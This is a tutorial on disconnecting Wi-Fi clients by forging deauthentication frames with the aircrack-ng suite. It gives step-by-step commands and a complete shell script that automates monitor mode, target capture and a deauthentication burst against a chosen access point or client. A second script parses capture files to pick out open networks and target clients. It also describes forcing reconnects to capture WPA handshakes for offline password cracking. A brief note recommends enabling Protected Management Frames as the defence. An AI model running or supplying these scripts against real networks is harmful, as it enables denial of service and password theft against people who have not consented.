
airodump-ng and aireplay-ng to deauthenticate clients from access point

Disconnecting wireless clients from access points

The problem

Wireless networking is problematic by nature: everything is transmitted over the air and can be received by anyone in range. The data stream itself is encrypted (WPA2/WPA3), but in plain IEEE 802.11 the management frames, including deauthentication and disassociation frames, are neither encrypted nor authenticated, so anyone who knows the BSSID of an access point and the MAC address of a client can forge them. The 802.11w amendment (Protected Management Frames, PMF) closes this gap by authenticating those frames, but on many devices that support it the option is disabled by default, so check the manual for your device's default setting and enable it; both the access point and the client must support it for the protection to apply. Leaving it off exposes stations and access points not only to denial or disruption of service, but also to attacks that rely on forcing a client to reconnect, such as an “evil-twin” rogue access point.

How to

To identify the network or device to disrupt, use airodump-ng. It listens on an adapter in monitor mode and lists nearby access points and their clients in real time; put the adapter into monitor mode first with airmon-ng, since airodump-ng itself does not switch the mode. Useful keys while it runs: “a” cycles which tables are shown (access points, stations, or both), “r” toggles realtime sorting, “s” changes the sort column, and the space bar pauses the display.

ip addr                                          # find your wireless adapter, e.g. wlan0
sudo airmon-ng start yournetadapter              # monitor mode; airmon-ng prints the new interface name, typically yournetadaptermon
sudo airodump-ng yournetadaptermon -w capturefilename   # scan; -w writes capture files (pcap, csv, ...) with this prefix

Base stations, i.e. access points, are listed in the first table and identified by the BSSID column; the ESSID column is the human-readable network name you use to recognise them. Stations, i.e. clients, appear in the second table, each with the BSSID it is associated to. You can deauthenticate a whole access point by its BSSID, which disconnects every client, or pick a single station from the second table and direct the attack at it precisely. Note the CH column as well: the adapter has to be tuned to the same channel as the access point for the forged frames to reach their targets.

For the deauthentication part of the procedure use the aireplay-ng tool. Pass --deauth with the number of deauthentication rounds to send (0 keeps sending until you interrupt it). Pass -a with the MAC address (BSSID) of the access point; without anything else the frames are broadcast to all of its clients. To target one station, add -c with the MAC of that client.

sudo aireplay-ng --deauth 100 -a BSSIDMAC -c STATIONMAC yournetadapter   # yournetadapter: the monitor-mode interface, on the AP's channel

With the right values passed, the station accepts the forged deauthentication frames, drops its association and has to reconnect, so its wireless service is disrupted for as long as the frames keep coming. As mentioned before, this only works where Protected Management Frames (802.11w) are not negotiated, which is still the case for many consumer devices; WPA3 makes PMF mandatory, so WPA3 networks are not affected. Enterprise deployments are more likely to have it enabled already, but verify rather than assume: if aireplay-ng reports that it is sending frames and the client stays connected, PMF or a channel mismatch is the usual reason.
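The whole procedure above, from monitor mode to the deauthentication burst, as one script. This is an added example, not code from the original post or from the aircrack-ng project; it assumes the aircrack-ng suite is installed, root privileges, an adapter that supports monitor mode, and that airmon-ng names the monitor interface by appending “mon” to the adapter name (check its output, the name varies by driver). The DRY_RUN variable, the run, valid_mac and deauth helpers and the capture prefix deauthcap are this example's own; with DRY_RUN=1 the script prints the commands instead of running them, so the flow can be checked without an adapter.

```shell
#!/bin/sh
# Added example (not from the original post): monitor mode, a short
# targeted capture, a deauthentication burst, then cleanup.
# Assumes the aircrack-ng suite is installed and the script runs as root.
# DRY_RUN=1 prints each command instead of executing it.
set -eu

DRY_RUN="${DRY_RUN:-0}"

# Execute a command, or print it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Six colon-separated hex octets; a mistyped address would aim the
# burst at the wrong device, so refuse anything else.
valid_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# deauth MONITOR_IFACE BSSID COUNT [CLIENT_MAC]
# COUNT 0 keeps sending until interrupted. Without CLIENT_MAC the
# deauthentication is broadcast to every client of the access point.
deauth() {
    mon_if=$1; bssid=$2; count=$3; client=${4:-}
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
    if [ -n "$client" ]; then
        valid_mac "$client" || { echo "bad client MAC: $client" >&2; return 1; }
        run aireplay-ng --deauth "$count" -a "$bssid" -c "$client" "$mon_if"
    else
        run aireplay-ng --deauth "$count" -a "$bssid" "$mon_if"
    fi
}

# main ADAPTER BSSID CHANNEL [COUNT] [CLIENT_MAC]
main() {
    iface=$1; bssid=$2; channel=$3; count=${4:-100}; client=${5:-}
    mon="${iface}mon"   # assumed monitor interface name; airmon-ng prints the real one

    # Stop NetworkManager/wpa_supplicant, which would otherwise retune the card.
    run airmon-ng check kill
    # Monitor mode locked to the access point's channel: the forged frames are
    # only heard if the adapter sits on the same channel as the AP.
    run airmon-ng start "$iface" "$channel"
    # Short capture filtered to the target; the CSV lists the associated
    # stations you can pick from. timeout ends it, so its status is ignored.
    run timeout 20 airodump-ng --bssid "$bssid" --channel "$channel" \
        -w deauthcap --output-format csv "$mon" || true
    deauth "$mon" "$bssid" "$count" "$client"
    run airmon-ng stop "$mon"
}

# Only act when invoked with arguments, e.g.
#   DRY_RUN=1 sh deauth.sh wlan0 AA:BB:CC:DD:EE:FF 6 100 11:22:33:44:55:66
if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

The MAC check is deliberately strict: aireplay-ng will happily take a malformed or wrong address, and a deauthentication burst aimed at the wrong BSSID is exactly the kind of mistake that turns a controlled test into an outage for a neighbour's network.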

Afterword

airodump-ng can be locked to a particular channel with --channel (-c) and filtered to a single access point with --bssid. It also shows networks with no security enabled at all (OPN in the ENC column). With capture writing enabled (-w), a deauthentication that forces a client to reconnect lets you intercept the WPA/WPA2 four-way handshake, which you can then try to crack offline against a wordlist, for example with aircrack-ng.
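Picking targets from the capture rather than from the live screen: airodump-ng -w also writes a CSV file (capturefilename-01.csv) containing an access-point table followed by a station table, and two small awk filters over it list the open networks and the clients associated to a given BSSID. This is an added example, not code from the original post or from aircrack-ng; the CSV in sample_csv is constructed to match airodump-ng's column layout rather than taken from a real capture, and the function names open_aps and clients_of are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): read the CSV that
# airodump-ng -w writes and pull out what matters for target selection.
set -eu

# Constructed airodump-ng CSV (not a real capture): an access-point table,
# a blank line, then a station table. Column order follows airodump-ng's
# own header lines, with the same space padding after each comma.
sample_csv() {
cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-05-01 09:00:00, 2024-05-01 09:10:00,  1,  54, OPN , , , -35,      200,        0,   0.  0.  0.  0,  10, CoffeeShop,
AA:BB:CC:DD:EE:02, 2024-05-01 09:00:00, 2024-05-01 09:10:00,  6, 130, WPA2, CCMP, PSK, -48,      150,        0,   0.  0.  0.  0,   7, HomeNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-05-01 09:01:00, 2024-05-01 09:09:00, -52,       40, AA:BB:CC:DD:EE:02, HomeNet
11:22:33:44:55:77, 2024-05-01 09:02:00, 2024-05-01 09:08:00, -60,       12, AA:BB:CC:DD:EE:02,
11:22:33:44:55:88, 2024-05-01 09:03:00, 2024-05-01 09:07:00, -70,        3, (not associated), CoffeeShop,HomeNet
EOF
}

# Access points with no encryption at all (Privacy column "OPN").
# Reads the CSV on stdin and prints "BSSID channel ESSID" per line.
open_aps() {
    awk -F',' '
        function trim(s) { gsub(/^ +| +$/, "", s); return s }
        /^BSSID,/       { section = "ap";  next }
        /^Station MAC,/ { section = "sta"; next }
        section == "ap" && NF >= 14 && trim($6) == "OPN" {
            print trim($1), trim($4), trim($14)
        }'
}

# Stations associated to the given BSSID, one MAC per line. Stations that
# are only probing show "(not associated)" in the BSSID column and are
# therefore skipped. Reads the CSV on stdin.
clients_of() {
    awk -F',' -v ap="$1" '
        function trim(s) { gsub(/^ +| +$/, "", s); return s }
        /^BSSID,/       { section = "ap";  next }
        /^Station MAC,/ { section = "sta"; next }
        section == "sta" && NF >= 6 && trim($6) == ap { print trim($1) }'
}

# With a real capture:  open_aps < capturefilename-01.csv
#                       clients_of AA:BB:CC:DD:EE:02 < capturefilename-01.csv
sample_csv | open_aps
sample_csv | clients_of AA:BB:CC:DD:EE:02
```

The filters split on commas, which is how airodump-ng writes the file; an ESSID that itself contains a comma shifts the ESSID column in the access-point table, so treat the ESSID output as a hint and rely on the BSSID, which is always the first field, when choosing a target.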

As an optional tool for any wireless-related activity I can recommend WiFiman for Android, which does the job of network perimeter exploration.
